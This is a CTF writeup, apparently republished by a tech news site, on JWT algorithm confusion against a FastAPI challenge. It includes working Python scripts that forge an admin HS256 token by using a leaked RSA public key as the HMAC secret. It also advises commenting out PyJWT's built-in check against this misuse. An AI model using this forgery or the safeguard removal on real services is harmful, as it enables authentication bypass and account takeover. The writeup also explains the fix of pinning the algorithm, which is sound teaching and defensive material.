2025-01-18 update, from SLTechnology News&Howtos > Network Security
Shulou (Shulou.com) 05/31 report
Many newcomers are unsure how to approach a JWT challenge in a CTF. This writeup walks through one such challenge in detail; anyone who needs it is welcome to follow along, and hopefully you will take something away from it.
I came across this CTF a couple of days ago. It goes like this:
Roughly, you submit the token built into the challenge, the backend answers with an access_token, and after logging in you find that viewing the profile file requires the admin user.
The challenge title already gives two hints: the FastAPI framework and JWT verification.
A quick search shows that FastAPI serves an interactive documentation page at /docs by default, and the challenge's /debug endpoint exposes a public key.
Searching Baidu then turned up plenty of JWT material:
JWT is short for JSON Web Token, often just called a JSON token. Defined in RFC 7519, it is a compact format for passing claims between parties as a JSON object. The information carried in a JWT is digitally signed, so the receiver can check that it has not been tampered with. A JWT can be signed with an HMAC (a shared secret) or with an RSA/ECDSA public/private key pair.
A JWT has three parts:
Header
Payload
Signature
The three parts are joined with '.', giving the form Header.Payload.Signature.
Header section:
Contains two fields, typ (token type) and alg (signing algorithm).
For example:
{"alg": "RS256", "typ": "JWT"}
JWT supports both asymmetric (public-key) and symmetric (shared-secret) signing, and which one is used is decided by the alg value in the header. Note that the header is part of the token, so it is under the sender's control.
That's the problem.
To quote the explanation from a more experienced player's writeup:
When using RS256, the program flow is:
Sign the JWT with the private key.
Use the public key to verify the integrity of the received JWT.
When using HS256, the program flow is:
Sign the JWT with the secret key.
Use the same secret key to verify the integrity of the JWT. Obviously, this key must not leak.
So if we know the public key, we can do the following:
Obtain a legitimate JWT signed with the RS256 algorithm.
Modify the JWT payload as we like, and change the alg in the header to HS256.
Re-sign the modified JWT with the HS256 algorithm, using the known public key as the secret.
Send it to the server. The server now verifies the JWT with public key + HS256, finds nothing wrong, and treats it as a legitimate JWT.
Payload part:
The payload carries the claims, which fall into three kinds:
Registered
Public
Private
Registered claims are predefined:
iss (issuer): who issued the token
exp (expiration time): when the token expires
sub (subject): the subject the token is about
aud (audience): the intended recipient
nbf (not before): the time from which the token is valid
iat (issued at): when the token was issued
jti (JWT ID): a unique identifier for the token
Public claims:
Usually hold some user information.
Private claims:
Custom claims agreed between the parties that share the token.
For example:
{"sub": "admin", "exp": 9902085613}
Signature part:
The signature is computed over two inputs:
The base64url-encoded header and payload, joined with '.'
The key (the shared secret for HS256, the private key for RS256)
These are fed to the algorithm chosen in the header. Note that this is signing, not encryption: the header and payload remain readable by anyone.
For HS256 it is roughly:
HMACSHA256(base64url(header) + '.' + base64url(payload), secret)
For RS256 the same header.payload string is signed with the RSA private key instead, and checked with the public key.
The layout of the whole JWT is shown in the following figure (image not reproduced here):
Picture source: the article "After reading this article on Session, Cookie and Token, you can argue with the interviewer".
So, back to the challenge itself.
Our goal is clear:
Using the public key exposed at /debug, construct a JWT that uses HS256.
Swap that JWT into our request.
The backend reads HS256 from the header, verifies the HMAC with its local public key as the secret, and then serves the data with the privileges of sub=admin.
The construction script is as follows (PyJWT):
import jwt  # PyJWT

# Public key leaked by the challenge's /debug endpoint
PUBLIC_KEY = (
    "-----BEGIN RSA PUBLIC KEY-----\n"
    "MIICCgKCAgEAn/KiHQ+/zwE7kY/Xf89PY6SowSb7CUk2b+lSVqC9u+R4BaE/5tNF\n"
    "eNlneGNny6fQhCRA+Pdw1UJSnNpG26z/uOK8+H7fMb2Da5t/94wavw410sCKVbvf\n"
    "ft8gKquUaeq//tp20BETeS5MWIXp5EXCE+lEdAHgmWWoMVMIOXwaKTMnCVGJ2SRr\n"
    "+xH9147FZqOa/17PYIIHuUDlfeGi+Iu7T6a+QZ0tvmHL6j9Onk/EEONuUDfElonY\n"
    "M688jhuAM/FSLfMzdyk23mJk3CKPah58nzVmb1YRyfBWiVFGYQqMCBnWgoGOanpd\n"
    "46Fp1ff1zBn4sZTfPSOus/+00D5Lxh7bsbRa6A1vAApfmTcu026lIb7gbG7DU1/s\n"
    "eDId9s1qA5BJpzWFKO4ztkPGvPTUok8hQBMDaSH1JOoFQgfJIfC7w2CQe+KbodQL\n"
    "3akKQDCZhcoA4tf5VC6ODJpFxCn6blML5cD6veOBPJiIk8DBRgmt2AHzOUju+5ns\n"
    "QcplOVxW5TFYxLqeJ8FPWqQcVekZ749FjchtAwPlUsoWIH0PTSun38ua8usrwTXb\n"
    "pBlf4r0wz22FPqaecvp7z6Rj/xfDauDGDSU4hmn/TY9Fr+OmFJPW/9k2RAv7KEFv\n"
    "FCLP/3U3r0FMwSe/FPHmt5fjAtsGlZLj+bZsgwFllYeD90VQU8Ds+KkCAwEAAQ==\n"
    "-----END RSA PUBLIC KEY-----\n"
)

# Claims we want the server to trust; exp only has to lie in the future
payload = {"sub": "admin", "exp": 9902085613}
header = {"typ": "JWT", "alg": "HS256"}

# Sign with HS256, using the public key as the HMAC secret. The secret must match
# the key bytes the server loads exactly, including the trailing newline, so try
# with and without it if the first attempt is rejected.
encoded = jwt.encode(payload, PUBLIC_KEY, algorithm="HS256", headers=header)
print(encoded)
Newer PyJWT releases add a check against exactly this misuse: when a key is handed to an HMAC algorithm, the library refuses it if it looks like asymmetric key material (PEM text starting with "-----BEGIN PUBLIC KEY-----", "-----BEGIN RSA PUBLIC KEY-----", "-----BEGIN CERTIFICATE-----" or "ssh-rsa") and raises InvalidKeyError.
So the script above errors out on a current PyJWT. The quick fix is to comment that check out in the installed library source, or to compute the HMAC yourself with the standard library. Keep in mind that this check lives in the client library; it does nothing for a server that still lets the token header choose the algorithm. The real fix on the server side is to pin the expected algorithm, e.g. jwt.decode(token, public_key, algorithms=["RS256"]), so an HS256 token is rejected before any key is touched.
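To tie the attack steps, the signature construction and the fix together, here is a self-contained Python example (added for this edit, not code from the original writeup or from the challenge). It forges the HS256 token with the standard library alone, which sidesteps the PyJWT client-side key check, and then runs it against a toy verifier in two configurations: one that takes alg from the header (the challenge's behaviour) and one that pins the algorithm and refuses PEM material as an HMAC secret. The PEM string is a constructed stand-in for the key leaked at /debug; it is not a valid RSA key, which does not matter because HS256 only cares about the raw bytes. The verifier only registers HS256, so it demonstrates the rejection path but does not verify real RS256 tokens.

```python
import base64
import hashlib
import hmac
import json

# Constructed stand-in for the PEM leaked at /debug (NOT a real RSA key).
# For the HS256 forgery only the exact bytes matter, so the body is irrelevant.
LEAKED_PUBLIC_KEY_PEM = (
    b"-----BEGIN RSA PUBLIC KEY-----\n"
    b"MIICCgKCAgEAexample+not+a+real+key+body+just+bytes+for+the+demo==\n"
    b"-----END RSA PUBLIC KEY-----\n"
)


class InvalidToken(Exception):
    pass


def b64url(data: bytes) -> str:
    """Unpadded base64url, as JWS requires (RFC 7515 section 2)."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def compact_json(obj: dict) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode("utf-8")


def forge_hs256_token(payload: dict, key: bytes) -> str:
    """Attacker side: chosen payload, alg switched to HS256, and the server's
    public key used as the HMAC secret. Pure stdlib, so no library key check."""
    header = {"typ": "JWT", "alg": "HS256"}
    signing_input = b64url(compact_json(header)) + "." + b64url(compact_json(payload))
    signature = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url(signature)


def _hs256_verify(key: bytes, signing_input: bytes, signature: bytes) -> bool:
    expected = hmac.new(key, signing_input, hashlib.sha256).digest()
    return hmac.compare_digest(expected, signature)


# alg -> verifier. Only HS256 is registered in this stdlib-only demo; a real
# server library registers RS256 and others alongside it.
VERIFIERS = {"HS256": _hs256_verify}

# Markers a library should refuse to accept as an HMAC secret
PEM_MARKERS = (b"-----BEGIN PUBLIC KEY-----", b"-----BEGIN RSA PUBLIC KEY-----",
               b"-----BEGIN CERTIFICATE-----", b"ssh-rsa")


def decode(token: str, key: bytes, algorithms=None, check_hmac_key=False) -> dict:
    """Server side. algorithms=None reproduces the bug: the header picks the
    algorithm, so an RS256 deployment verifies HS256 with its own public key.
    algorithms=["RS256"] pins it; check_hmac_key adds the refusal to use
    public-key material as an HMAC secret."""
    try:
        head_b64, body_b64, sig_b64 = token.split(".")
    except ValueError:
        raise InvalidToken("token must have three segments") from None
    header = json.loads(b64url_decode(head_b64))
    alg = header.get("alg")
    if algorithms is not None and alg not in algorithms:
        raise InvalidToken(f"alg {alg!r} not in server allow-list {algorithms}")
    verify = VERIFIERS.get(alg)
    if verify is None:
        raise InvalidToken(f"alg {alg!r} not supported")
    if alg.startswith("HS") and check_hmac_key and key.startswith(PEM_MARKERS):
        raise InvalidToken("asymmetric key material must not be used as an HMAC secret")
    signing_input = (head_b64 + "." + body_b64).encode("ascii")
    if not verify(key, signing_input, b64url_decode(sig_b64)):
        raise InvalidToken("signature mismatch")
    return json.loads(b64url_decode(body_b64))


def accepts(token: str, key: bytes, **kwargs) -> bool:
    """True if the server configuration given by kwargs would accept the token."""
    try:
        decode(token, key, **kwargs)
        return True
    except InvalidToken:
        return False


if __name__ == "__main__":
    forged = forge_hs256_token({"sub": "admin", "exp": 9902085613}, LEAKED_PUBLIC_KEY_PEM)
    print(forged)
    print("header-chosen alg:", accepts(forged, LEAKED_PUBLIC_KEY_PEM))                        # True
    print("pinned to RS256  :", accepts(forged, LEAKED_PUBLIC_KEY_PEM, algorithms=["RS256"]))  # False
    print("HMAC key check   :", accepts(forged, LEAKED_PUBLIC_KEY_PEM, check_hmac_key=True))   # False
```

The order of checks in decode is the point: the allow-list test runs before any key material is used, so the pinned configuration never gets near the HMAC path. The PEM-marker check is defence in depth for the case where someone does configure an HMAC algorithm with the wrong key.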